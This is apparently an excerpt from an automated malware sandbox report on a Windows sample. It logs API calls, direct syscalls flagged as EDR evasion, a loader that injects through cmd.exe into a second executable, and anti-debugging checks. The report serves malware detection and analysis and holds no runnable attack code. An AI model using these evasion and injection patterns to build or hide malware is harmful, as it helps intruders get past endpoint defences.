Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0B530E LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_6D0B530E
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008E540B GetProcessHeap,RtlAllocateHeap,0_2_008E540B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00927142 SetUnhandledExceptionFilter,0_2_00927142
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0092D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092D3EE
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00926B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00926B18
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00926FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00926FAF
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F67142 SetUnhandledExceptionFilter,2_2_00F67142
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F6D3EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F6D3EE
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F66B18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00F66B18
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F66FAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F66FAF
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A46CD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D0A46CD
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0926E8 _wcscpy,_wcscpy,_wcscpy,_wcscpy,SetErrorMode,SetUnhandledExceptionFilter,2_2_6D0926E8
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0AD4E7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D0AD4E7
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C14AD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,3_2_6C14AD2C
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0D07A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_6C0D07A7

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF6FA0DAFF7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA002902Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA120B17Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA155603Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF6FA1EEB76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF6FA1737A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA08B5DBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA091DA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF6FA1A3594Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6F9FFD233Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA155695Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA09DEC3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFBCB7626A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA08548AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA1EFE30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA147DC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA148C5DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA0D7905Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6FA0AD451Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA09A1C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA1F5ABEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateMutant: Direct from: 0x7FF6FA0A9CC5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtTerminateProcess: Direct from: 0x7FF6FA0901F5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF6FA0A0F38Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF6FA078213Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF6FA081459Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6FA0ACE0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA14730DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6FA1F1097
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF6FA1EFA02Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF6FA07813EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6FA0ACC2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateValueKey: Direct from: 0x7FF6FA1382E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA14DDA8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6FA1F10A5
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF6FA16DD18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6FA0AD818Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA0D4F99Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtOpenKeyEx: Direct from: 0x7FF6FA07DD6DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6F9FFD052Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA002437Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA14BF3BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA151B29Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA0001D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA1A6893Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF6FA08BE25Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA155383Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA14FE5FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA090ECFJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6BE07B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA1484F5Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeNtQuerySystemInformation: Direct from: 0x774563E1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA147D02Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA15C62AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6F9FFBB54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA09905FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA081094Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF6F9FF40C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA0A3141Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFBCB784B5EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA14D6C6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA096E09Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA091682Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA147F27Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF6F9FF4267Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationThread: Direct from: 0x7FF6FA1FC5E6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6FA1F1083
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA1A5106Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA159E50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6F9FFA27EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA0A3D28Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA08BF24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA1ECA0BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA16A871Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x7FF6FA08BF81Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA102733Jump to behavior
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA080C76Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA14D855Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF6FA090DF7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6FA1EEB94
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF6FA1ECCB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA0D8A54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA1486E2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6FA14D7C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6F9FF7A9EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryVolumeInformationFile: Direct from: 0x7FF6FA099DB8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6FA091386Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF6FA17C8C2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA00057BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA124EA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6F9FF3F62Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF6FA17258BJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6FA153605Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 289010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 3F4010Jump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeProcess created: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632Jump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093DA1F InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_0093DA1F
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093B493 AllocateAndInitializeSid,CheckTokenMembership,0_2_0093B493
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1526451147.000000006CA8E000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000004.00000002.1588722536.000000006B8DE000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00927255 cpuid 0_2_00927255
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D0B4C5D
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_6D0B4C99
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_6D0B490A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_6D0B4965
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_6D0B4863
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_6D0B4B36
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6D0B4BF6
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_6D0AC51C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_6D0B476E
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D0B428A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_6D0B3F9C
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_6D0B5593
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_6D0B54B9
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_6D0A94E4
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: GetLocaleInfoA,2_2_6D0AB4F8
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___g